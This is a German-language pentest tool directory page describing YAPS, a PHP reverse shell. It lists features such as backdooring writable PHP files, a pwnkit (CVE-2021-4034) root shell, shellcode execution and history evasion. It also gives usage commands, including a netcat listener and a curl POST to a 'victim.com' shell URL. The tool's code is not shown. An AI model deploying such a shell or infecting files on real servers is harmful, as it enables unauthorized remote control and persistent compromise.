Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
YAPS — Yet Another PHP Shell - Das umfassendste PHP Reverse Shell | Kitploit
Tools/GitHubGitHub/nickguitar/yaps
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationShellcodeInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubnickguitar/yaps
849vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

YAPS

Yet Another PHP Shell - Das umfassendste PHP Reverse Shell

Repository anzeigen

YAPS - Noch eine PHP-Shell

image

Ja, wie der Name verrät, ist dies eine weitere PHP-Reverse-Shell, eine unter Hunderten, die es gibt, aber mit einigen Vorteilen. Es ist eine einzelne PHP-Datei, die alle ihre Funktionen enthält, und Sie können sie über einen einfachen TCP-Listener steuern (z.B. nc -lp 1337).

In der aktuellen Version (1.5) unterstützen die Hauptfunktionen nur Linux-Systeme, aber ich plane, sie auch unter Windows zum Laufen zu bringen.

Es ist derzeit in seiner ersten Version und ich habe es noch nicht viel getestet, und es gibt noch viele Dinge, die ich für die nächsten Versionen tun und verbessern möchte (es ist noch nicht fertig!), also lass es mich bitte wissen, wenn du Fehler gefunden hast oder einen Vorschlag für eine Funktion oder Verbesserung hast. =)

Funktionen

  • Einzelne PHP-Datei (keine Notwendigkeit, Pakete, Bibliotheken zu installieren oder Unmengen von Dateien herunterzuladen)
  • Funktioniert mit netcat, ncat, socat, multi/handler, fast jedem Listener
  • Anpassbarer Passwortschutz
  • Keine Logs in .bash_history
  • Führt eine gewisse Enumeration durch
    • Netzwerkinformationen (Schnittstellen, iptables-Regeln, aktive Ports)
    • Benutzerinformationen
    • Liste SUID- und GUID-Dateien
    • Suche nach SSH-Schlüsseln (öffentlich und privat)
    • Liste Crontab
    • Liste beschreibbare PHP-Dateien
  • Automatischer Download von LinPEAS, LinEnum oder Linux Exploit Suggester
  • PHP-Code auf dem entfernten Host schreiben und ausführen
  • Eine interaktive Reverse-Shell starten
  • So viele Verbindungen duplizieren, wie Sie möchten
  • Automatische Aktualisierung
  • PHP-Dateien mit Hintertüren infizieren
  • Automatische Reverse-Root-Shell über pwnkit (CVE-2021-4034)
  • [NEU] Shellcode senden und ausführen

Nachteile

  • Verbindung ist (noch) nicht verschlüsselt (nc unterstützt kein SSL)
  • Nicht vollständig interaktiv (obwohl Sie mit !interactive eine interaktive Shell starten können)
    • STRG+C unterbricht es; Pfeiltasten können nicht zur Navigation verwendet werden (es sei denn, Sie verwenden rlwrap nc -lp <ip> <port>)

Verwendung

  1. Richten Sie einen TCP-Listener ein;
  2. Legen Sie Ihre IP und Ihren Port fest. Dies kann folgendermaßen erfolgen:
  • 2.1 Bearbeiten der Variablen am Anfang des Skripts;
  • 2.2 Festlegen per POST-Anfrage (curl -x POST -d "x=ip:port" victim.com/yaps.php);
  1. Öffnen Sie yaps.php im Browser, curl es oder führen Sie es über die CLI aus;
  • 3.1 Sie können yaps.php?s oder yaps.php?silent setzen, um das Banner zu unterdrücken
  • 3.2 Sie können es über die CLI mit php yaps.php ip port ausführen
  1. Hacken!

Arbeitsbefehle

  • !help - Hilfe-Menü anzeigen
  • !all-colors - Alle Farben umschalten (kompatibel mit farblosen TTYs)
  • !color - PS1-Farbe umschalten (nur lokal, keine Umgebungsvariable wird geändert)
  • !duplicate - Eine weitere YAPS-Verbindung starten
  • !enum - LinPEAS und LinEnum nach /tmp herunterladen und bereit zum Verwenden machen
  • !info - Informationen über das Ziel auflisten (die oben erwähnte Aufzählung)
  • !infect - Beschreibbare PHP-Dateien mit Hintertüren infizieren
  • !interactive - Interaktive Reverse-Shells auf anderen Ports starten (funktioniert mit sudo, su, mysql, etc.)
  • !passwd - Passwortoption (aktivieren, deaktivieren, setzen, ändern)
  • !php - PHP auf dem entfernten Host schreiben und ausführen

Screenshots

Klicken Sie, um den Screenshots-Bereich zu erweitern

Aktuelle Befehle:

commands

Ein wenig Aufklärung betreiben:

image

Root-Reverse-Shell über CVE-2021-4034

pwn

Shellcode senden und ausführen!

shellcode

Starten einer interaktiven Shell

interactive

Duplizieren einer YAPS-Sitzung

Changelog

v1.5 - 12/02/2022

  • !shellcode hinzugefügt, um einen beliebigen Shellcode zu empfangen und auszuführen
  • duplicate()-Funktion verbessert (Sie können jetzt einen Bereich von Ports angeben)
  • Funktionsname von stabilize in interactive geändert
  • Eingebettete Codes gepackt, um Platz zu sparen
  • Kaputte Links repariert
  • TERM=xterm allen Befehlen vorangestellt
  • Kleinere Verbesserungen

v1.4 - 04/02/2022

  • !pwnkit hinzugefügt, um CVE-2021-4034 auszunutzen und eine Root-Reverse-Shell zu starten
  • verify_update()-Funktion verbessert
  • Kleinere Verbesserungen

v1.3.1 - 01/08/2021

  • Fehler behoben

v1.3 - 28/07/2021

  • !infect hinzugefügt, um PHP-Dateien mit Hintertüren zu infizieren
  • !stabilize-Payload geändert (Fehler behoben)

v1.2.2 - 18/07/2021

  • 'update'-Funktion geändert
  • 'connect'-Funktion geändert
  • 'download'-Funktion verbessert
  • Fehler behoben

v1.2.1 - 17/07/2021

  • Fehler behoben

v1.2 - 17/07/2021

  • !duplicate hinzugefügt, um eine weitere Shell zu starten
  • Update-Überprüfung hinzugefügt (--update|-u)
  • CLI-Argumente hinzugefügt (--help|-h)
  • Socket über Argumente hinzugefügt (php yaps.php ip port)
  • Methode zur Stabilisierung der Shell geändert (friert nicht mehr ein)
  • Download-Methode geändert
  • Verbindungsmethode über POST geändert (empfängt einen einzelnen Parameter)

v1.1 - 12/07/2021

  • !all-colors hinzugefügt, um Terminalfarben umzuschalten und mit farblosen TTYs zu arbeiten
  • exit-Befehl hinzugefügt, um den Socket zu schließen (Shell verlassen)
  • Payload in !stabilize geändert, um HISTSIZE und HISTFILE zu deaktivieren
  • Methode zum Abrufen von CPU- und Speicherinformationen in !info geändert

v1.0.1 - 08/07/2021

  • [x,y,z] in array(x,y,z) geändert, um die Kompatibilität mit älteren PHP-Versionen zu verbessern
  • Payload für interaktive Shell geändert, um mit PHP<5.4 zu funktionieren

Credits

Einige Ideen wurden von diesen Tools inspiriert:

Linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Linenum

https://github.com/rebootuser/LinEnum

Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Pentest Monkey

https://github.com/pentestmonkey/php-reverse-shell

Arthepsy exploit for pwnkit

https://github.com/arthepsy/CVE-2021-4034/

Tool herunterladen
  • !pwnkit - Versucht, CVE-2021-4034 auszunutzen und eine Root-Reverse-Shell zu starten
  • !shellcode - Shellcode senden und auf dem entfernten Host ausführen
  • !suggester - Linux Exploit Suggester nach /tmp herunterladen und bereit zum Verwenden machen
  • duplicate

    Infizieren von PHP-Dateien

    infect

    Schreiben von entferntem PHP-Code

    remotephp

    Passwortgeschützte Shell

    passprotected